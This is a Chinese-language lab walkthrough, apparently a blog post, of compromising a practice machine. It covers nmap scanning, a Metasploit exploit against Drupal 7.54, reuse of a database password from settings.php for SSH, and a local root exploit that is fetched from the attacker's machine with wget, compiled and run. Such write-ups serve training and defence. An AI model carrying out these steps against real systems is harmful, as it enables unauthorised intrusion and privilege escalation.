简介
靶机:192.168.217.134
攻击机:192.168.217.128 (kali)均使用NAT网络模式
1、信息收集
对靶机IP的搜集一般是两种方式:
sudo arp-scan -l
或者 namp -sN 192.168.217.0/24
对靶机进行全端口扫描
nmap -p- 192.168.217.134
对特殊端口进行详细扫描
nmap -p 1898,80,22 -sV -A 192.168.217.134
2、对端口信息进行利用
这里可以先对80端口进行访问
http://192.168.217.134:80
然并无,没有可利用信息,选择另外的端口进行访问,或者根据第一不搜集的端口协议等信息进行利用,这里是可以直接访问
http://192.168.217.134:1898
这里有登录的功能,所谓渗透测试,便是对任何可能出现的问题进行操作,在真实环境下需要多多的进行尝试。
在页面存在的其他可点击链接随便点点看看,这里需要注意的是有连个URL是相似的,以node=1和以node=3结尾,这里应该测试node=2或者其他。
本环境中访问2时,得到的信息是一个语音和一个图片。
图片是一个二维码,扫描之后无卵用;
语音是“tiago”,这应该是一个用户名或其他,记录下来,做渗透测试要养成记录信息的习惯。
3、进行目录爆破
使用 dirb 或者 dirsearch 都可以,尽可能多的对扫描的目录进行访问,该靶场可利用的文件是CHANGELOG.txt,文件可以获取的信息是该站使用的中间件是Drupal7.54
4、使用MSF进行利用
上面得到的Drupal可以通过msf进行搜索,并对其进行利用,这里利用的是一个2018年的漏洞,渗透测试过程中可以多利用几个,注意站内使用的版本是哪一年的,择payload时,要用新的。
设置payload,并run直接getshell。
pwd
发现当前目录为/var/html
这里有个文件路径需要记住
/var/html/sites/default/settings.php
这里存了很多配置信息,甚至包含了数据库的密码、这里便是得到了数据库的密码。
所谓渗透测试,便是不断地尝试,不断地错误,然后发现正确的方式。没有人能够确定这个数据库的密码是不是tiago用户的密码的,但是可以进行尝试,万一真确了呢。
在shell中可以cd /home 查看系统存在哪些个用户,这里就是tiago。使用tiago用户,尝试密码就是上面那个数据库密码,发现正确。
密码爆破手段
我发现有的文章是在网站的网页信息中提取疑似可以利用的信息,组成一个字典,使用hydra进行爆破,本人没有尝试,但是这种字典肯定是抽取的关键字越多,越容易爆破出来。
5、利用22端口
尝试使用tiago用户和密码进行ssh登录
ssh tiago@192.168.217.134
输入密码回车,登录成功。
id whoami 一顿操作,只是一个普通用户。
6、提权
uname -a
得到的信息是ubantu 14.04
kali一般都有提权exp
searchploit ubantu 14.04
会出现一列exp,选择一个可利用的使用cp命令复制到一个自己想用的文件夹当中,个人操作习惯是对一个系统渗透会在桌面创建一个文件夹,里面存方各种信息,将这个文件存放到这里,并在这个文件夹里开启一个服务
python -m http.server 8080
在ssh的tiago对话框进行操作
which wget 查看是否可以使用wget
这里是可以使用的:wget http://192.168.217.128:8080/文件名即可下载到ssh所使用的当前目录。
gcc -Wall -std=c++11 -O2 -o exp 文件名 -lutil
使用ls查看是否得到一个名为exp的文件
./exp执行该文件即可提权成功啦
传文件小技巧
1、scp 本地文件路径 对端用户名@对端ip地址:对端文件地址文件名
输入对端密码可以传输过去
2、见过一个办法就是将本地exp复制,到对端穿件一个文件使用vim粘贴并保存,直接利用。
2986
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
